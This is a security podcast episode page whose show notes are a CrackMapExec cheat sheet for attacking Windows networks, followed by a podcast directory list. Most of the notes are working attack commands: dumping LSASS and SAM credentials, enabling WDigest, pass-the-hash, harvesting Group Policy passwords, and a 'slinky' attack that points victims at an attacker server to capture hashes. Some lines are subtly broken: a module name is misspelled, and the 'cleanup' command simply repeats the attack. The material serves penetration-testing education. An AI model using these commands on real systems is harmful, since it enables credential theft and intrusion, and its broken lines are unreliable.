7MS #562: Cracking and Mapping and Execing with CrackMapExec
7 Minute Security3 Maalis 2023

7MS #562: Cracking and Mapping and Execing with CrackMapExec

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares # Conduct slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

Jaksot(705)

Suosittua kategoriassa Politiikka ja uutiset

rss-ootsa-kuullut-tasta
aikalisa
tervo-halme
ootsa-kuullut-tasta-2
politiikan-puskaradio
viisupodi
et-sa-noin-voi-sanoo-esittaa
rss-podme-livebox
otetaan-yhdet
aihe
linda-maria
the-ulkopolitist
rss-hyvaa-huomenta-bryssel
rss-kuka-mina-olen
politbyroo
rss-pallo-keskelle-2
rss-lets-talk-about-hair
rss-polikulaari-humanisti-vastaa-ja-muut-ts-podcastit
rss-agility-unite-podcast
rss-raha-talous-ja-politiikka